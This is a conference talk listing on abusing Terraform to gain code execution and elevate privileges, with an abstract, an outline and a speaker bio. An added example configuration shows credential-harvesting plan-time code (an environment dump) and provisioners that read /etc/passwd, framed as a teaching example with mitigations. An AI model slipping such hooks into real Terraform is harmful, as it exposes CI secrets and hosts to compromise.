BSidesSATX 2023

Infrastructure as Remote Code Execution: How to abuse Terraform to elevate access
2023-06-10, 15:00–15:45, Track 3 (Moody Rm 102)

This talk focuses on ways to abuse Terraform, from a developer's perspective, to elevate privileges, expose data, and gain further footholds in an environment. We cover the common uses of Terraform, how a malicious actor could abuse it, and how the usual security controls can be bypassed to execute unapproved code. The talk includes multiple demos of ways to exploit Terraform Cloud.


The talk draws on research into real Terraform implementations and the ways a malicious user could abuse them. It covers how Terraform works, how common Terraform security controls are applied, and multiple ways to bypass those controls and gain further access to the environment.

Outline:

How Terraform works
How plan and apply impact security controls
Remote code execution methods:
    remote-exec
    local-exec
    external data source
Data gathering methods:
    data sources
    secrets
Security control bypasses
Solutions
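The three code-execution paths the outline lists, and the plan-versus-apply timing that decides which controls get to see them, as an added example configuration. It is not from the talk or the speaker; the providers are the standard hashicorp/external and hashicorp/null providers, and the commands, file paths, host address and key path are illustrative assumptions.

```hcl
# Added example, not from the talk. Three places Terraform will run arbitrary
# code, and when each one fires. Commands, paths, host and key are assumptions.

terraform {
  required_providers {
    external = { source = "hashicorp/external" }
    null     = { source = "hashicorp/null" }
  }
}

# 1. external data source: the program runs during `terraform plan` (and
#    `terraform refresh`), before anyone reviews the plan output and before a
#    post-plan policy check (for example Sentinel in Terraform Cloud) runs.
#    Terraform only requires that stdout be a JSON object of strings; any
#    other side effect of the program is invisible to the plan.
data "external" "plan_time" {
  program = [
    "/bin/sh", "-c",
    # assumed payload: dump the runner's environment (where CI credentials
    # commonly live), then return the JSON Terraform expects
    "env > /tmp/plan-time-env.txt; printf '{\"status\":\"ok\"}'",
  ]
}

# 2. local-exec provisioner: runs on the machine performing `terraform apply`
#    (a developer workstation, a CI agent, or a Terraform Cloud worker) after
#    the resource is created. It does not run during plan, so the plan shows
#    only "null_resource.apply_time_local will be created".
resource "null_resource" "apply_time_local" {
  provisioner "local-exec" {
    command = "id > /tmp/apply-ran-as.txt"   # assumed payload
  }
}

# 3. remote-exec provisioner: runs inside a provisioned host over SSH (or
#    WinRM) using whatever credentials the connection block supplies. Also
#    apply-time, so it is subject to the same review gap as local-exec.
resource "null_resource" "apply_time_remote" {
  connection {
    type        = "ssh"
    host        = "10.0.0.10"                # assumed: a host created elsewhere
    user        = "ubuntu"                   # assumed
    private_key = file("~/.ssh/id_ed25519")  # assumed key path
  }
  provisioner "remote-exec" {
    inline = ["id", "cat /etc/passwd"]       # assumed payload
  }
}

# Referencing the data source makes its (already executed) result part of the
# plan; the command it ran is not shown anywhere in `terraform plan` output.
output "plan_time_result" {
  value = data.external.plan_time.result.status
}
```

The security-relevant distinction is the timing: a review or policy step that inspects the plan before approving apply catches cases 2 and 3 only in the sense that it sees null resources being created, and it does not catch case 1 at all, because the external program has already executed on the runner by the time the plan exists. That is why the "Solutions" item matters in practice: denying or allow-listing providers (external, null) at the policy layer, running plans on workers with no credentials beyond what plan needs, and treating every plan as code execution rather than as a read-only preview.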

This talk introduces the underlying concepts to people new to Terraform and then explains, in depth, the ways Terraform can be abused.

Michael McCabe is the president of Cloud Security Partners. Michael helps clients migrate their workloads to the cloud in a secure and managed way. He's worked with large financials during their cloud migrations and transformations. He focuses on creating secure and approachable solutions for his clients.